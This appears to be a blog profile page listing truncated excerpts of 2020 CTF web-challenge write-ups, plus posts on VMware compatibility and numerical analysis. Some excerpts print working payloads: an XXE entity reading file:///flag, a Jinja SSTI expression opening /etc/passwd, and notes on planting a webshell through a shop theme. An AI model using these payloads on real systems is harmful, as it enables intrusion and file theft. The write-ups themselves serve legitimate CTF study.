- 博客(15)
- 收藏
- 关注
RSS订阅原创 VMware Workstation 与 Device/Credential Guard 不兼容。
前不久更新了win版本到2004,为了wsl2然后挺好用就很久没有再用虚拟机了,然后突然发现虚拟机又不兼容了。先试了网上几种方法发现不行,打开gpedit失败,关闭hapeV也没找到这玩意。 https://www.jianshu.com/p/90d44a9ee0d1采取了这篇文章的方法发现有效于是记录一下 下载关闭DG的工具工具链接 管理员进入cmd或powershell运行 Set-ExecutionPolicy RemoteSignedY./DG_Readiness_Too
2020-08-30 15:00:26
168
原创 xxe编码绕过(8-19)
[CSAWQual 2019]Web_Unagi只能上传xml文件,考虑存在xxe直接上传显示waf拦截了,转换成utf16编码就能绕过<!--filename:1.xml--><!--author:ta3shi--><!DOCTYPE users[<!ENTITY a SYSTEM "file:///flag">]><users><user><username>Alice</u
2020-08-19 22:47:37
1670
原创 flask ssti-subprocess.Popen(8-18)
学习文章[CSCCTF 2019 Qual]FlaskLightget方法请求结合题目试试ssti说明确实存在ssti读取文件成功但是读不了app.py,命令执行也被禁止,看看大佬怎么bypass的先写个脚本爆出可利用的类import requestsimport reimport htmlimport timeindex = 0for i in range(170, 1000): try: url = "http://aa86b4ee.
2020-08-18 23:02:27
799
原创 xxe-本地dtd引用(8-17)
[GoogleCTF2019 Quals]Bnv题目发包信息为json,但是如果服务器能够解析xml并且并没有相应的过滤的话,就有可能存在xxe漏洞,具体参见神奇的Content-Type——在JSON中玩转XXE攻击
2020-08-17 20:38:23
440
原创 8-15(信息收集-账户接管漏洞)
[V&N2020 公开赛]HappyCTFd这个题打开看到是CTFd.io,用到了CVE-2020-7245 CTFd v2.0.0 – v2.2.2的账户接管漏洞逻辑是申请账号的时候可用前面或后面的空格绕过重名限制,而修改密码的时候会将提交的用户名去掉头尾的空格就可以攻击受害人。那么我们看到有个admin用户已经存在了,显然就是受害人,我们注册一个 空格+admin的账户,因为buu的题不能访问外网 所以我们需要注册一个buu的邮箱然后注册之后退出用admin登录并选择忘记密码
2020-08-15 23:19:50
271
原创 8-14刷题(php反序列化,Smarty ssti,json命令执行)
[NPUCTF2020]ReadlezPHP找到time.php?source,打开的得到time.php的源码<?php#error_reporting(0);class HelloPhp{ public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s"; $this->b = "date"; } publ
2020-08-14 22:11:20
933
原创 8-13刷题
[GYCTF2020]FlaskApp加密没问题,解密的时候随便输入字母报错了,输入e3syKzN9fQ==//{{2+3}},返回5说明存在ssti注入,python3的ssti先试一下读文件{{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['open']('/etc/passwd').read()}}e3soKS5fX2NsYXNzX18uX19iYXNlc19fWz.
2020-08-14 16:23:57
515
原创 8-12刷题
[极客大挑战 2019]RCE ME<?phperror_reporting(0);if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long.");
2020-08-12 23:54:22
556
原创 8-11刷题
[GWCTF 2019]枯燥的抽奖在check.php里找到了验证的源码,SESSION固定情况下,mt_srand()函数生成的是伪随机数,那么我们破解就可以了mt_seed破解工具先根据前十个写出解密需要的参数str1 ='8505R6hICJ'str2 = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"result =''length = str(len(str2)-1)for i in
2020-08-11 21:11:31
237
原创 第一次周总结
sql注入的1、注入过滤掉单引号可以尝试用户名处用\将后面单引号转义,后面整形注入2、带username和password时,有时可以直接查询这两个字段3、异或注入php1、反序列化时寻找可控点,闭合双引号2、phar序列化及利用初探phar3、call_func_user()等能够执行命令的函数利用及反序列化4、filter等伪协议的灵活使用。XXE攻击xxe漏洞模板格式<!DOCTYPE ANY [ <!ENTITY admin SYST
2020-08-10 15:37:58
119
原创 2020-08-10
9号是个懒狗没做题[GKCTF2020]老八小超市儿打开之后各种瞎点没有思路,大佬wp告诉我这种时候就要找管理后门,后门地址/admin.php,用户admin密码shopxo。登录之后主题插马,先下载一个默认主题,将马插到里面再上传之后从主页图片看到页面地址http://8c45f2f9-5337-49d1-921b-2c712fe6aa66.node3.buuoj.cn/public/static/index/default/test.php蚁剑连上根目录找
2020-08-10 15:13:14
162
原创 8月8日刷题
[网鼎杯 2020 朱雀组]phpwebf12发现有post数据hackbar看一下是call_user_func()函数,用file_get_contents读取一下index.php <?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate",
2020-08-08 18:30:14
377
原创 8-7日刷题
[ciscn2019 华北赛区 day1 web2]ikun知识点:逻辑漏洞,jwt,python反序列化这题本来是在buuctf做的,后来buuctf维护,然后就在攻防世界做了打开题目看到一定要买到lv6,随手翻页,看到如图,那么要找到lv6.png,写个脚本来找快一点。import requests as resurl='http://8110e838-75a9-4a2f-8b80-38b3680ba32c.node3.buuoj.cn/shop?page='for i
2020-08-08 14:02:28
364
原创 buuctf刷题记录
8月6日buuctf[MRCTF2020]Ez_bypass知识点MD5绕过,php特性打开得到源码I put something in F12 for youinclude 'flag.php';$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (m
2020-08-06 21:41:58
826
原创 数值计算方法(1)
绪论1.rolle定理与微分中值定理2.泰勒定理3.线性有关与线性无关4.范德蒙德行列式5.方阵及其初等变换后的行列式6.方程组解的存在唯一性7.特殊三角形矩阵8.方阵的逆及其运算性质9.子矩阵和主子式10.对称矩阵和正定矩阵11.向量内积第一章1.数值分析的研究对象与特点一 数值分析概况(1).研究对象:数值分析的内容包括数值逼近,数值积分与数值微分,非线性方程组数...
2020-02-24 10:05:05
2369
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人